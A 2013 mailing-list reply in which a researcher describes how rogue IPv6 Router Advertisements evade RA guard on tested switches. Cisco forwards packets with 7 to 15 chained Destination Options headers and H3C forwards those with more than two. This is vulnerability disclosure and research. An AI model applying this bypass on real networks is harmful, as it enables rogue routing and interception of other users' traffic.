[ipv6hackers] RA guard evasion

Matej Gregr igregr at fit.vutbr.cz
Wed May 15 13:27:50 CEST 2013

On 05/15/2013 02:06 AM, Fernando Gont wrote:
> On 05/13/2013 11:24 AM, Matej Gregr wrote:
>> Hi guys,
>>   most of you are familiar with the concept of RA guard and its ability
>> to filter rogue RAs. We have tested 3 switches for access and
>> distribution layer and found, that we are able to evade the protection
>> quite easilly on all of them. First method is using fragment header and
>> this is well known and documented behaviour. However, you are also able
>> to evade the protection using several destination options headers (it
>> depends on the platform). We believe, that this behaviour is not well
>> documented, so we wrote an article.
>> http://6lab.cz/article/rogue-router-advertisement-attack/
> Do you mean that there's a difference between including one Dst Option
> Header (as in Section 2.1 of
> <http://tools.ietf.org/id/draft-ietf-v6ops-ra-guard-implementation-07.txt>)
> vs. multiple Dst Option headers?
> Maybe it has to do with how many bytes into the packet the layer-2
> device can see/inspect?
> Thanks!
> Best regards,

Yes Fernando, there is a difference.
If a Cisco switch with RA guard policy receives RA with one Dst Option
Header, it will drop the packet. If you concatenate six Dst Option
Headers, the cisco switch will drop the packet. If you concatenate 7 or
more headers, it will forward it. However, if you concatenate more than
16 Dst Option headers, it will drop the packet. So, you can bypass the
RA guard policy by adding a number of Dst Option Headers between 7 and
15 and you are able to bypass the policy.
If the switch cannot parse the header chain in the hardware, it should
punt it into the software - which is actually happening with header
chain more than 15 extension headers, but is not happening with header
chain 7 - 15 headers long.
It is not related, how many bytes the switch can see/inspect, because it
can parse even 50 headers without a problem and drop the packet.

H3C is able to parse 2 Dst Option headers. E.g. if you send RA packet
with 1 or 2 Dst Option Headers, the switch will drop it. If you add
more, the switch will always forward the packet.



More information about the Ipv6hackers mailing list